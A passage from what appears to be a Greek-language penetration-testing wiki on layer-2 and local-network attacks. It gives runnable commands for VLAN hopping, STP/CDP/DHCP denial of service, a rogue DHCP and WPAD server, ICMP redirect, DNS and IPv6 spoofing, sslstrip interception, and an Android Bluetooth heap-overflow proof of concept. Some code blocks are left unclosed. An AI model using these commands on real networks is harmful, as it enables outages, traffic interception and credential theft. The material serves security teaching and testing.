root@kali:~# arp-scan -I eth1.250 10.121.5.0/24

</details>
```bash
# Another configuration example
modprobe 8021q
vconfig add eth1 20
ifconfig eth1.20 192.168.1.2 netmask 255.255.255.0 up

# Another configuration example
sudo vconfig add eth0 30
sudo ip link set eth0.30 up
sudo dhclient -v eth0.30

Automatic VLAN Hopper

Η συζητημένη επίθεση του Dynamic Trunking and creating virtual interfaces an discovering hosts inside άλλων VLANs εκτελείται αυτόματα από το εργαλείο: https://github.com/nccgroup/vlan-hopping—frogger

Double Tagging

Αν ένας επιτιθέμενος γνωρίζει την τιμή του MAC, IP and VLAN ID του θύματος, μπορεί να προσπαθήσει να double tag a frame με το καθορισμένο VLAN του και το VLAN του θύματος και να στείλει ένα πακέτο. Καθώς το θύμα δεν θα μπορέσει να συνδεθεί πίσω με τον επιτιθέμενο, η καλύτερη επιλογή για τον επιτιθέμενο είναι να επικοινωνήσει μέσω UDP με πρωτόκολλα που μπορούν να εκτελέσουν ενδιαφέρουσες ενέργειες (όπως SNMP).

Another option for the attacker is to launch a TCP port scan spoofing an IP controlled by the attacker and accessible by the victim (probably through internet). Then, the attacker could sniff in the second host owned by him if it receives some packets from the victim.

Για να εκτελέσετε αυτή την επίθεση μπορείτε να χρησιμοποιήσετε το scapy: pip install scapy

from scapy.all import *
# Double tagging with ICMP packet (the response from the victim isn't double tagged so it will never reach the attacker)
packet = Ether()/Dot1Q(vlan=1)/Dot1Q(vlan=20)/IP(dst='192.168.1.10')/ICMP()
sendp(packet)

Lateral VLAN Segmentation Bypass

If you have access to a switch that you are directly connected to, you have the ability to bypass VLAN segmentation within the network. Simply switch the port to trunk mode (otherwise known as trunk), create virtual interfaces with the IDs of the target VLANs, and configure an IP address. You can try requesting the address dynamically (DHCP) or you can configure it statically. It depends on the case.

Lateral VLAN Segmentation Bypass

Layer 3 Private VLAN Bypass

Σε ορισμένα περιβάλλοντα, όπως guest wireless networks, εφαρμόζονται ρυθμίσεις port isolation (also known as private VLAN) για να αποτρέπεται η άμεση επικοινωνία μεταξύ clients που είναι συνδεδεμένοι σε ένα wireless access point. Ωστόσο, έχει εντοπιστεί μια τεχνική που μπορεί να παρακάμψει αυτά τα μέτρα απομόνωσης. Η τεχνική εκμεταλλεύεται είτε την έλλειψη network ACLs είτε την λανθασμένη διαμόρφωσή τους, επιτρέποντας στα IP packets να δρομολογηθούν μέσω ενός router ώστε να φτάσουν σε άλλο client στο ίδιο δίκτυο.

Η επίθεση εκτελείται δημιουργώντας ένα packet that carries the IP address of the destination client but with the router’s MAC address. Αυτό προκαλεί το router να προωθήσει λανθασμένα το packet προς τον στοχευμένο client. Η προσέγγιση αυτή είναι παρόμοια με αυτή που χρησιμοποιείται στις Double Tagging Attacks, όπου η δυνατότητα ελέγχου ενός host προσβάσιμου από το θύμα αξιοποιείται για να εκμεταλλευτεί την ευπάθεια.

Key Steps of the Attack:

1. Crafting a Packet: Ένα packet κατασκευάζεται ειδικά ώστε να περιλαμβάνει τη διεύθυνση IP του στοχευόμενου client αλλά με το MAC address του router.
2. Exploiting Router Behavior: Το crafted packet αποστέλλεται προς το router, το οποίο, λόγω της διαμόρφωσης, ανακατευθύνει το packet στον στοχευόμενο client, παρακάμπτοντας την απομόνωση που παρέχουν οι private VLAN ρυθμίσεις.

VTP Attacks

VTP (VLAN Trunking Protocol) κεντρικοποιεί τη διαχείριση των VLAN. Χρησιμοποιεί revision numbers για να διατηρεί την ακεραιότητα της VLAN database· οποιαδήποτε τροποποίηση αυξάνει αυτόν τον αριθμό. Τα switches υιοθετούν τις ρυθμίσεις με υψηλότερους revision numbers, ενημερώνοντας τις δικές τους VLAN databases.

VTP Domain Roles

• VTP Server: Διαχειρίζεται τα VLAN—δημιουργεί, διαγράφει, τροποποιεί. Εκπέμπει VTP announcements στα μέλη του domain.
• VTP Client: Λαμβάνει VTP announcements για να συγχρονίσει τη VLAN database του. Αυτός ο ρόλος δεν επιτρέπει τοπικές τροποποιήσεις στη διαμόρφωση VLAN.
• VTP Transparent: Δεν συμμετέχει σε VTP updates αλλά προωθεί τα VTP announcements. Δεν επηρεάζεται από VTP attacks και διατηρεί σταθερό revision number μηδέν.

VTP Advertisement Types

• Summary Advertisement: Εκπέμπεται από τον VTP server κάθε 300 δευτερόλεπτα και μεταφέρει βασικές πληροφορίες του domain.
• Subset Advertisement: Αποστέλλεται μετά από αλλαγές στη διαμόρφωση VLAN.
• Advertisement Request: Εκδίδεται από έναν VTP client για να ζητήσει ένα Summary Advertisement, συνήθως ως απάντηση στην ανίχνευση ενός υψηλότερου configuration revision number.

Οι ευπάθειες του VTP εκμεταλλεύονται αποκλειστικά μέσω trunk ports, καθώς τα VTP announcements κυκλοφορούν μόνο μέσα από αυτά. Σε σενάρια μετά από DTP επιθέσεις, μπορεί να στραφεί προσοχή στο VTP. Εργαλεία όπως το Yersinia μπορούν να διευκολύνουν VTP attacks, με στόχο τη διαγραφή της VLAN database, διαταράσσοντας ουσιαστικά το δίκτυο.

Note: This discussion pertains to VTP version 1 (VTPv1).

yersinia -G # Launch Yersinia in graphical mode

Στη γραφική λειτουργία του Yersinia, επιλέξτε την επιλογή deleting all VTP vlans για να εκκαθαρίσετε τη βάση δεδομένων VLAN.

STP Επιθέσεις

Εάν δεν μπορείτε να καταγράψετε πλαίσια BPDU στις διεπαφές σας, είναι απίθανο να πετύχετε σε επίθεση STP.

STP BPDU DoS

Η αποστολή μεγάλου αριθμού BPDUs TCP (Topology Change Notification) ή Conf (τα BPDUs που αποστέλλονται όταν δημιουργείται η τοπολογία) υπερφορτώνει τα switches και αυτά σταματούν να λειτουργούν σωστά.

yersinia stp -attack 2
yersinia stp -attack 3
#Use -M to disable MAC spoofing

STP TCP Attack

Όταν αποστέλλεται ένα TCP, ο πίνακας CAM των switches θα διαγραφεί σε 15s. Έπειτα, αν στέλνετε συνεχώς αυτό το είδος πακέτων, ο πίνακας CAM θα επανεκκινείται συνεχώς (ή κάθε 15segs) και όταν επανεκκινήσει, ο switch συμπεριφέρεται ως hub

yersinia stp -attack 1 #Will send 1 TCP packet and the switch should restore the CAM in 15 seconds
yersinia stp -attack 0 #Will send 1 CONF packet, nothing else will happen

STP Root Attack

Ο επιτιθέμενος προσομοιώνει τη συμπεριφορά ενός switch για να γίνει ο STP root του δικτύου. Έτσι, περισσότερα δεδομένα θα διακινούνται μέσω αυτού. Αυτό είναι ενδιαφέρον όταν είστε συνδεδεμένοι σε δύο διαφορετικά switches.
Αυτό επιτυγχάνεται στέλνοντας πακέτα BPDUs CONF που αναφέρουν ότι η τιμή του priority είναι μικρότερη από την πραγματική τιμή του root switch.

yersinia stp -attack 4 #Behaves like the root switch
yersinia stp -attack 5 #This will make the device behaves as a switch but will not be root

Εάν ο attacker είναι συνδεδεμένος σε 2 switches μπορεί να γίνει root του νέου δέντρου και όλη η κίνηση μεταξύ αυτών των switches θα περνάει μέσω αυτού (a MITM attack will be performed).

yersinia stp -attack 6 #This will cause a DoS as the layer 2 packets wont be forwarded. You can use Ettercap to forward those packets "Sniff" --> "Bridged sniffing"
ettercap -T -i eth1 -B eth2 -q #Set a bridge between 2 interfaces to forwardpackages

CDP Attacks

CISCO Discovery Protocol (CDP) είναι απαραίτητο για την επικοινωνία μεταξύ CISCO devices, επιτρέποντάς τους να αναγνωρίζουν η μία την άλλη και να μοιράζονται λεπτομέρειες διαμόρφωσης.

Παθητική Συλλογή Δεδομένων

Το CDP είναι ρυθμισμένο να εκπέμπει πληροφορίες μέσω όλων των θυρών, κάτι που μπορεί να οδηγήσει σε κίνδυνο ασφάλειας. Ένας επιτιθέμενος, συνδεόμενος σε μια θύρα switch, μπορεί να αναπτύξει network sniffers όπως Wireshark, tcpdump, ή Yersinia. Αυτή η ενέργεια μπορεί να αποκαλύψει ευαίσθητα δεδομένα για τη συσκευή δικτύου, συμπεριλαμβανομένου του μοντέλου της και της έκδοσης του Cisco IOS που τρέχει. Ο επιτιθέμενος μπορεί στη συνέχεια να στοχεύσει συγκεκριμένες ευπάθειες στην εντοπισμένη έκδοση του Cisco IOS.

Πρόκληση Πλημμύρας στον Πίνακα CDP

Μια πιο επιθετική προσέγγιση περιλαμβάνει την εκτέλεση μιας επίθεσης Denial of Service (DoS) υπερφορτώνοντας τη μνήμη του switch, προσποιούμενη ότι είναι νόμιμες συσκευές CISCO. Παρακάτω φαίνεται η ακολουθία εντολών για την έναρξη μιας τέτοιας επίθεσης χρησιμοποιώντας το Yersinia, ένα εργαλείο δικτύου σχεδιασμένο για δοκιμές:

sudo yersinia cdp -attack 1 # Initiates a DoS attack by simulating fake CISCO devices
# Alternatively, for a GUI approach:
sudo yersinia -G

Κατά τη διάρκεια αυτής της επίθεσης, η CPU του switch και ο πίνακας γειτόνων CDP επιβαρύνονται έντονα, οδηγώντας σε αυτό που συχνά αναφέρεται ως “παράλυση του δικτύου” λόγω της υπερβολικής κατανάλωσης πόρων.

CDP Impersonation Attack

sudo yersinia cdp -attack 2 #Simulate a new CISCO device
sudo yersinia cdp -attack 0 #Send a CDP packet

You could also use scapy. Be sure to install it with scapy/contrib package.

Επιθέσεις VoIP και το εργαλείο VoIP Hopper

Τα VoIP τηλέφωνα, που ολοένα και περισσότερο ενσωματώνονται με συσκευές IoT, προσφέρουν λειτουργίες όπως το ξεκλείδωμα πορτών ή τον έλεγχο θερμοστατών μέσω ειδικών τηλεφωνικών αριθμών. Ωστόσο, αυτή η ενσωμάτωση μπορεί να δημιουργήσει κινδύνους ασφαλείας.

Το εργαλείο voiphopper έχει σχεδιαστεί για να μιμείται ένα VoIP τηλέφωνο σε διάφορα περιβάλλοντα (Cisco, Avaya, Nortel, Alcatel-Lucent). Ανακαλύπτει το VLAN ID του φωνητικού δικτύου χρησιμοποιώντας πρωτόκολλα όπως CDP, DHCP, LLDP-MED και 802.1Q ARP.

VoIP Hopper προσφέρει τρεις λειτουργίες για το Cisco Discovery Protocol (CDP):

1. Sniff Mode (-c 0): Αναλύει πακέτα δικτύου για να εντοπίσει το VLAN ID.
2. Spoof Mode (-c 1): Δημιουργεί προσαρμοσμένα πακέτα που μιμούνται αυτά μιας πραγματικής VoIP συσκευής.
3. Spoof with Pre-made Packet Mode (-c 2): Στέλνει πακέτα όμοια με αυτά ενός συγκεκριμένου Cisco IP phone model.

Η προτιμότερη λειτουργία για ταχύτητα είναι η τρίτη. Απαιτεί τον καθορισμό:

• The attacker’s network interface (-i parameter).
• The name of the VoIP device being emulated (-E parameter), adhering to the Cisco naming format (e.g., SEP followed by a MAC address).

Σε εταιρικά περιβάλλοντα, για να μιμηθείτε μια υπάρχουσα VoIP συσκευή, μπορείτε να:

• Ελέγξετε την ετικέτα MAC στο τηλέφωνο.
• Πλοηγηθείτε στις ρυθμίσεις οθόνης του τηλεφώνου για να δείτε πληροφορίες μοντέλου.
• Συνδέσετε τη VoIP συσκευή σε ένα laptop και παρακολουθήσετε CDP requests χρησιμοποιώντας Wireshark.

An example command to execute the tool in the third mode would be:

voiphopper -i eth1 -E 'SEP001EEEEEEEEE ' -c 2

DHCP Επιθέσεις

Απογραφή

nmap --script broadcast-dhcp-discover
Starting Nmap 7.80 ( https://nmap.org ) at 2019-10-16 05:30 EDT
WARNING: No targets were specified, so 0 hosts scanned.
Pre-scan script results:
| broadcast-dhcp-discover:
|   Response 1 of 1:
|     IP Offered: 192.168.1.250
|     DHCP Message Type: DHCPOFFER
|     Server Identifier: 192.168.1.1
|     IP Address Lease Time: 1m00s
|     Subnet Mask: 255.255.255.0
|     Router: 192.168.1.1
|     Domain Name Server: 192.168.1.1
|_    Domain Name: mynet
Nmap done: 0 IP addresses (0 hosts up) scanned in 5.27 seconds

DoS

Two types of DoS μπορούν να πραγματοποιηθούν εναντίον των DHCP servers. Η πρώτη συνίσταται στο simulate enough fake hosts to use all the possible IP addresses.
Αυτή η επίθεση θα λειτουργήσει μόνο αν μπορείτε να δείτε τις απαντήσεις του DHCP server και να ολοκληρώσετε το πρωτόκολλο (Discover (Comp) –> Offer (server) –> Request (Comp) –> ACK (server)). Για παράδειγμα, αυτό δεν είναι δυνατό σε Wifi networks.

Ένας άλλος τρόπος για να εκτελεστεί ένα DHCP DoS είναι να αποσταλεί ένα DHCP-RELEASE packet using as source code every possible IP. Τότε, ο server θα νομίσει ότι όλοι έχουν σταματήσει να χρησιμοποιούν την IP.

yersinia dhcp -attack 1
yersinia dhcp -attack 3 #More parameters are needed

Μια πιο αυτόματη μέθοδος για να το κάνετε αυτό είναι η χρήση του εργαλείου DHCPing

Μπορείτε να χρησιμοποιήσετε τις αναφερόμενες επιθέσεις DoS για να αναγκάσετε τους πελάτες να λάβουν νέες μισθώσεις μέσα στο περιβάλλον και να εξαντλήσετε τους νόμιμους servers, ώστε να γίνουν μη ανταποκρινόμενοι. Έτσι, όταν οι νόμιμοι προσπαθήσουν να επανασυνδεθούν, μπορείτε να σερβίρετε κακόβουλες τιμές που αναφέρονται στην επόμενη επίθεση.

Ορισμός κακόβουλων τιμών

Ένας κακόβουλος DHCP server μπορεί να ρυθμιστεί χρησιμοποιώντας το script DHCP που βρίσκεται στο /usr/share/responder/DHCP.py. Αυτό είναι χρήσιμο για network attacks, όπως η καταγραφή HTTP traffic και credentials, ανακατευθύνοντας την κίνηση σε έναν κακόβουλο διακομιστή. Ωστόσο, η ρύθμιση μιας κακόβουλης gateway είναι λιγότερο αποτελεσματική καθώς επιτρέπει μόνο την καταγραφή της εξερχόμενης κίνησης από τον πελάτη, χάνοντας τις απαντήσεις από την πραγματική gateway. Αντί για αυτό, συνιστάται η ρύθμιση ενός κακόβουλου DNS ή WPAD server για μια πιο αποτελεσματική επίθεση.

Παρακάτω είναι οι επιλογές εντολών για τη διαμόρφωση του κακόβουλου DHCP server:

• Our IP Address (Gateway Advertisement): Use -i 10.0.0.100 για να διαφημίσετε την IP της μηχανής σας ως gateway.
• Local DNS Domain Name: Προαιρετικά, χρησιμοποιήστε -d example.org για να ορίσετε ένα τοπικό DNS domain name.
• Original Router/Gateway IP: Use -r 10.0.0.1 για να καθορίσετε την IP του νόμιμου router ή gateway.
• Primary DNS Server IP: Use -p 10.0.0.100 για να ορίσετε την IP του κακόβουλου DNS server που ελέγχετε.
• Secondary DNS Server IP: Προαιρετικά, χρησιμοποιήστε -s 10.0.0.1 για να ορίσετε μια δευτερεύουσα DNS server IP.
• Netmask of Local Network: Use -n 255.255.255.0 για να ορίσετε το netmask για το τοπικό δίκτυο.
• Interface for DHCP Traffic: Use -I eth1 για να ακούει για DHCP traffic σε συγκεκριμένη network interface.
• WPAD Configuration Address: Use -w “http://10.0.0.100/wpad.dat” για να ορίσετε τη διεύθυνση για WPAD configuration, βοηθώντας στην υποκλοπή web traffic.
• Spoof Default Gateway IP: Include -S για να spoof-άρετε την IP της προεπιλεγμένης gateway.
• Respond to All DHCP Requests: Include -R για να κάνετε τον server να απαντά σε όλα τα DHCP requests, αλλά λάβετε υπόψη ότι αυτό είναι θορυβώδες και μπορεί να εντοπιστεί.

Χρησιμοποιώντας σωστά αυτές τις επιλογές, μπορεί να εγκαθιδρυθεί ένας κακόβουλος DHCP server για να παρεμβάλλεται και να υποκλέπτει την κίνηση δικτύου με αποτελεσματικό τρόπο.

# Example to start a rogue DHCP server with specified options
!python /usr/share/responder/DHCP.py -i 10.0.0.100 -d example.org -r 10.0.0.1 -p 10.0.0.100 -s 10.0.0.1 -n 255.255.255.0 -I eth1 -w "http://10.0.0.100/wpad.dat" -S -R

EAP Attacks

Εδώ είναι μερικές από τις τακτικές επίθεσης που μπορούν να χρησιμοποιηθούν εναντίον υλοποιήσεων 802.1X:

• Ενεργή brute-force δοκιμή κωδικού μέσω EAP
• Επίθεση στον RADIUS server με παραμορφωμένο περιεχόμενο EAP **(exploits)
• Καταγραφή μηνυμάτων EAP και offline password cracking (EAP-MD5 και PEAP)
• Επιβολή EAP-MD5 authentication για παράκαμψη της επαλήθευσης πιστοποιητικού TLS
• Έγχυση κακόβουλης network traffic κατά την authentication χρησιμοποιώντας hub ή παρόμοιο

Εάν ο επιτιθέμενος βρίσκεται ανάμεσα στο θύμα και τον authentication server, μπορεί να προσπαθήσει να υποβαθμίσει (εφόσον χρειαστεί) το authentication protocol σε EAP-MD5 και να καταγράψει την προσπάθεια authentication. Έπειτα, μπορεί να brute-force αυτό χρησιμοποιώντας:

eapmd5pass –r pcap.dump –w /usr/share/wordlist/sqlmap.txt

FHRP (GLBP & HSRP) Επιθέσεις

FHRP (First Hop Redundancy Protocol) είναι μια κατηγορία πρωτοκόλλων δικτύου σχεδιασμένη για να δημιουργεί ένα ενεργό πλεονασματικό σύστημα δρομολόγησης. Με το FHRP, οι φυσικοί routers μπορούν να συνδυαστούν σε μια ενιαία λογική συσκευή, γεγονός που αυξάνει την αντοχή σε σφάλματα και βοηθά στη διανομή του φόρτου.

Cisco Systems engineers have developed two FHRP protocols, GLBP and HSRP.

GLBP & HSRP Attacks

RIP

Υπάρχουν τρεις εκδόσεις του Routing Information Protocol (RIP): RIP, RIPv2 και RIPng. Τα datagrams από τα RIP και RIPv2 αποστέλλονται σε peers μέσω της θύρας 520 χρησιμοποιώντας UDP, ενώ το RIPng μεταδίδει datagrams στη θύρα UDP 521 μέσω IPv6 multicast. Το RIPv2 εισήγαγε υποστήριξη για MD5 authentication. Από την άλλη πλευρά, το RIPng δεν ενσωματώνει native authentication· αντ’ αυτού βασίζεται σε προαιρετικές κεφαλίδες IPsec AH και ESP στο IPv6.

• RIP and RIPv2: Η επικοινωνία γίνεται μέσω UDP datagrams στη θύρα 520.
• RIPng: Χρησιμοποιεί την UDP θύρα 521 για broadcast datagrams μέσω IPv6 multicast.

Σημειώστε ότι το RIPv2 υποστηρίζει MD5 authentication ενώ το RIPng δεν περιλαμβάνει native authentication, βασιζόμενο σε IPsec AH και ESP κεφαλίδες στο IPv6.

EIGRP Επιθέσεις

EIGRP (Enhanced Interior Gateway Routing Protocol) είναι ένα δυναμικό πρωτόκολλο δρομολόγησης. Είναι ένα distance-vector πρωτόκολλο. Εάν δεν υπάρχει πιστοποίηση και ρύθμιση παθητικών διεπαφών, ένας εισβολέας μπορεί να παρέμβει στη δρομολόγηση EIGRP και να προκαλέσει δηλητηρίαση των πινάκων δρομολόγησης. Επιπλέον, το δίκτυο EIGRP (δηλ. το autonomous system) είναι επίπεδο και δεν έχει τμηματοποίηση σε ζώνες. Εάν ένας επιτιθέμενος εισάγει μια διαδρομή, είναι πιθανό αυτή η διαδρομή να εξαπλωθεί σε ολόκληρο το αυτόνομο σύστημα EIGRP.

Η επίθεση σε ένα σύστημα EIGRP απαιτεί την εγκαθίδρυση γειτνίασης με έναν νόμιμο EIGRP router, κάτι που ανοίγει πολλές δυνατότητες, από βασική αναγνώριση μέχρι διάφορες ενέσεις.

FRRouting σας επιτρέπει να υλοποιήσετε έναν virtual router που υποστηρίζει BGP, OSPF, EIGRP, RIP και άλλα πρωτόκολλα. Το μόνο που χρειάζεται είναι να το αναπτύξετε στο σύστημα του επιτιθέμενου και μπορείτε ουσιαστικά να προσποιηθείτε ότι είστε ένας νόμιμος router στον τομέα δρομολόγησης.

EIGRP Attacks

Coly έχει δυνατότητες για την παγίδευση EIGRP broadcasts. Επιτρέπει επίσης την έγχυση πακέτων, η οποία μπορεί να χρησιμοποιηθεί για την τροποποίηση των ρυθμίσεων δρομολόγησης.

OSPF

Στο πρωτόκολλο Open Shortest Path First (OSPF) συχνά χρησιμοποιείται MD5 authentication για να διασφαλιστεί ασφαλής επικοινωνία μεταξύ routers. Ωστόσο, αυτό το μέτρο ασφαλείας μπορεί να παρακαμφθεί με εργαλεία όπως Loki και John the Ripper. Αυτά τα εργαλεία μπορούν να καταγράψουν και να σπάσουν MD5 hashes, αποκαλύπτοντας το authentication key. Μόλις αποκτηθεί αυτό το key, μπορεί να χρησιμοποιηθεί για την εισαγωγή νέων πληροφοριών δρομολόγησης. Για να διαμορφώσετε τις παραμέτρους της διαδρομής και να ορίσετε το συμβιβασμένο key, χρησιμοποιούνται αντίστοιχα οι καρτέλες Injection και Connection.

• Capturing and Cracking MD5 Hashes: Χρησιμοποιούνται εργαλεία όπως Loki και John the Ripper.
• Configuring Route Parameters: Γίνεται μέσω της καρτέλας Injection.
• Setting the Compromised Key: Το key ρυθμίζεται κάτω από την καρτέλα Connection.

Other Generic Tools & Sources

• Above: Εργαλείο για σάρωση της κυκλοφορίας δικτύου και ανεύρεση ευπαθειών
• Μπορείτε να βρείτε περισσότερες πληροφορίες για network attacks here.

Spoofing

Ο επιτιθέμενος διαμορφώνει όλες τις παραμέτρους δικτύου (GW, IP, DNS) του νέου μέλους του δικτύου αποστέλλοντας ψευδείς απαντήσεις DHCP.

Ettercap
yersinia dhcp -attack 2 #More parameters are needed

ARP Spoofing

Δείτε την previous section.

ICMPRedirect

Το ICMP Redirect συνίσταται στην αποστολή ενός ICMP packet type 1 code 5 που υποδεικνύει ότι ο attacker είναι ο καλύτερος τρόπος για να προσεγγίσει μια IP. Έπειτα, όταν το victim θέλει να επικοινωνήσει με την IP, θα στείλει το packet μέσω του attacker.

Ettercap
icmp_redirect
hping3 [VICTIM IP ADDRESS] -C 5 -K 1 -a [VICTIM DEFAULT GW IP ADDRESS] --icmp-gw [ATTACKER IP ADDRESS] --icmp-ipdst [DST IP ADDRESS] --icmp-ipsrc [VICTIM IP ADDRESS] #Send icmp to [1] form [2], route to [3] packets sent to [4] from [5]

DNS Spoofing

Ο attacker θα επιλύσει μερικά (ή όλα) από τα domains που ζητάει ο victim.

set dns.spoof.hosts ./dns.spoof.hosts; dns.spoof on

Ρύθμιση του δικού σας DNS με dnsmasq

apt-get install dnsmasq
echo "addn-hosts=dnsmasq.hosts" > dnsmasq.conf
echo "127.0.0.1   domain.example.com" > dnsmasq.hosts
sudo dnsmasq -C dnsmasq.conf --no-daemon
dig @localhost domain.example.com # Test the configured DNS

Τοπικές Πύλες

Συχνά υπάρχουν πολλαπλές διαδρομές προς συστήματα και δίκτυα. Αφού δημιουργήσετε μια λίστα με διευθύνσεις MAC στο τοπικό δίκτυο, χρησιμοποιήστε gateway-finder.py για να εντοπίσετε hosts που υποστηρίζουν IPv4 forwarding.

</details>


### [Spoofing LLMNR, NBT-NS, and mDNS](spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md)

Για την τοπική επίλυση ονομάτων όταν οι αναζητήσεις DNS αποτυγχάνουν, τα συστήματα Microsoft βασίζονται στο **Link-Local Multicast Name Resolution (LLMNR)** και στην **NetBIOS Name Service (NBT-NS)**. Παρομοίως, οι υλοποιήσεις **Apple Bonjour** και **Linux zero-configuration** χρησιμοποιούν το **Multicast DNS (mDNS)** για την ανεύρεση συστημάτων στο δίκτυο. Εξαιτίας της μη αυθεντικοποιημένης φύσης αυτών των πρωτοκόλλων και του ότι λειτουργούν πάνω από UDP και εκπέμπουν multicast/broadcast μηνύματα, μπορούν να εκμεταλλευτούν οι επιτιθέμενοι για να ανακατευθύνουν χρήστες σε κακόβουλες υπηρεσίες.

Μπορείς να υποδυθείς υπηρεσίες που αναζητούν οι hosts χρησιμοποιώντας το Responder για να στείλεις ψευδείς απαντήσεις.\
Διάβασε εδώ περισσότερες πληροφορίες για [how to Impersonate services with Responder](spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md).

### [Spoofing WPAD](spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md)

Οι browsers συχνά χρησιμοποιούν το **Web Proxy Auto-Discovery (WPAD) protocol για να αποκτήσουν αυτόματα ρυθμίσεις proxy**. Αυτό περιλαμβάνει την ανάκτηση ρυθμίσεων από έναν server, συνήθως μέσω ενός URL όπως "http://wpad.example.org/wpad.dat". Η ανακάλυψη αυτού του server από τους clients μπορεί να γίνει μέσω διαφόρων μηχανισμών:

- Μέσω του **DHCP**, όπου η ανακάλυψη διευκολύνεται με τη χρήση μιας ειδικής εγγραφής με κωδικό 252.
- Μέσω **DNS**, που περιλαμβάνει την αναζήτηση ενός hostname με την ετικέτα _wpad_ στο τοπικό domain.
- Μέσω **Microsoft LLMNR and NBT-NS**, που είναι μηχανισμοί fallback που χρησιμοποιούνται όταν οι αναζητήσεις DNS αποτυγχάνουν.

Το εργαλείο Responder εκμεταλλεύεται αυτό το πρωτόκολλο λειτουργώντας ως **malicious WPAD server**. Χρησιμοποιεί DHCP, DNS, LLMNR και NBT-NS για να παραπλανήσει τους clients ώστε να συνδεθούν σε αυτό. Για να εξετάσετε πιο διεξοδικά πώς μπορούν να υποδυθούν υπηρεσίες χρησιμοποιώντας το Responder, [check this](spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md).

### [Spoofing SSDP and UPnP devices](spoofing-ssdp-and-upnp-devices.md)

Μπορείτε να προσφέρετε διάφορες υπηρεσίες στο δίκτυο για να προσπαθήσετε να παγιδεύσετε έναν χρήστη ώστε να εισάγει κάποιες **plain-text credentials**. **Περισσότερες πληροφορίες για αυτή την επίθεση στο** [**Spoofing SSDP and UPnP Devices**](spoofing-ssdp-and-upnp-devices.md)**.**

### IPv6 Neighbor Spoofing

Αυτή η επίθεση είναι πολύ παρόμοια με το ARP Spoofing αλλά στον κόσμο του IPv6. Μπορείτε να κάνετε το θύμα να νομίζει ότι η IPv6 διεύθυνση του GW έχει το MAC του επιτιθέμενου.
```bash
sudo parasite6 -l eth0 # This option will respond to every requests spoofing the address that was requested
sudo fake_advertise6 -r -w 2 eth0 <Router_IPv6> #This option will send the Neighbor Advertisement packet every 2 seconds

sysctl -w net.ipv6.conf.all.forwarding=1 4
ip route add default via <ROUTER_IPv6> dev wlan0
fake_router6 wlan0 fe80::01/16

dhcp6.spoof on
dhcp6.spoof.domains <list of domains>

mitm6

apt-get install sslstrip
sslstrip -w /tmp/sslstrip.log --all - l 10000 -f -k
#iptables --flush
#iptables --flush -t nat
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
iptables -A INPUT -p tcp --destination-port 10000 -j ACCEPT

sudo nc -l -p 80
socat TCP4-LISTEN:80,fork,reuseaddr -

FILENAME=server
# Generate a public/private key pair:
openssl genrsa -out $FILENAME.key 1024
# Generate a self signed certificate:
openssl req -new -key $FILENAME.key -x509 -sha256 -days 3653 -out $FILENAME.crt
# Generate the PEM file by just appending the key and certificate files:
cat $FILENAME.key $FILENAME.crt >$FILENAME.pem

sudo socat -v -v openssl-listen:443,reuseaddr,fork,cert=$FILENAME.pem,cafile=$FILENAME.crt,verify=0 -

sudo socat -v -v openssl-listen:443,reuseaddr,fork,cert=$FILENAME.pem,cafile=$FILENAME.crt,verify=0  openssl-connect:[SERVER]:[PORT],verify=0

</details>


### Σημειώσεις Ενεργής Ανακάλυψης

Λάβετε υπόψη ότι όταν ένα UDP πακέτο αποστέλλεται σε μια συσκευή που δεν έχει το ζητούμενο port, αποστέλλεται ένα ICMP (Port Unreachable).

### **ARP ανακάλυψη**

Τα ARP πακέτα χρησιμοποιούνται για να εντοπιστούν ποιες IP χρησιμοποιούνται μέσα στο δίκτυο. Ο PC πρέπει να στείλει ένα αίτημα για κάθε πιθανή διεύθυνση IP και μόνο αυτές που χρησιμοποιούνται θα απαντήσουν.

### **mDNS (multicast DNS)**

Το Bettercap στέλνει ένα MDNS αίτημα (κάθε X ms) ζητώντας το **\_services\_.dns-sd.\_udp.local**. Η μηχανή που βλέπει αυτό το πακέτο συνήθως απαντά σε αυτό το αίτημα. Έπειτα, αναζητά μόνο μηχανές που απαντούν στο "services".

**Εργαλεία**

- Avahi-browser (--all)
- Bettercap (net.probe.mdns)
- Responder

### **NBNS (NetBios Name Server)**

Το Bettercap κάνει broadcast πακέτα στη θύρα 137/UDP ζητώντας για το όνομα "CKAAAAAAAAAAAAAAAAAAAAAAAAAAA".

### **SSDP (Simple Service Discovery Protocol)**

Το Bettercap στέλνει broadcast SSDP πακέτα ψάχνοντας για κάθε είδους υπηρεσίες (UDP Port 1900).

### **WSD (Web Service Discovery)**

Το Bettercap στέλνει broadcast WSD πακέτα ψάχνοντας για υπηρεσίες (UDP Port 3702).


## Bluetooth (L2CAP/ATT/GATT) Επιθέσεις

- Το Android Fluoride εκθέτει services πάνω από L2CAP PSMs (π.χ., SDP 0x0001, RFCOMM 0x0003, BNEP 0x000F, AVCTP 0x0017/0x001B, AVDTP 0x0019, ATT/GATT 0x001F). Οι services εγγράφονται μέσω:
```c
uint16_t L2CA_Register2(uint16_t psm, const tL2CAP_APPL_INFO& p_cb_info,
bool enable_snoop, tL2CAP_ERTM_INFO* p_ertm_info,
uint16_t my_mtu, uint16_t required_remote_mtu,
uint16_t sec_level);

acl  = ACLConnection(src_bdaddr, dst_bdaddr, auth_mode='justworks')
gatt = acl.l2cap_connect(psm=PSM_ATT, mtu=672)
gatt.send_frag(p8(GATT_READ)+p16(1234))
print(gatt.recv())

# GATT_REQ_READ_MULTI_VAR (0x20), MTU=55
acl  = ACLConnection(interface, bdaddr)
gatt = acl.l2cap_connect(psm=PSM_ATT, mtu=55)
pkt  = b'\x20'  # opcode
pkt += p16(9); pkt += p16(9); pkt += p16(9); pkt += p16(9)
gatt.send(pkt)
# On 4th insert: p_buf->len=55 (1 + 3*(16+2)), total_len=73 -> len=16-(73-55)=-2 -> ~64KB overwrite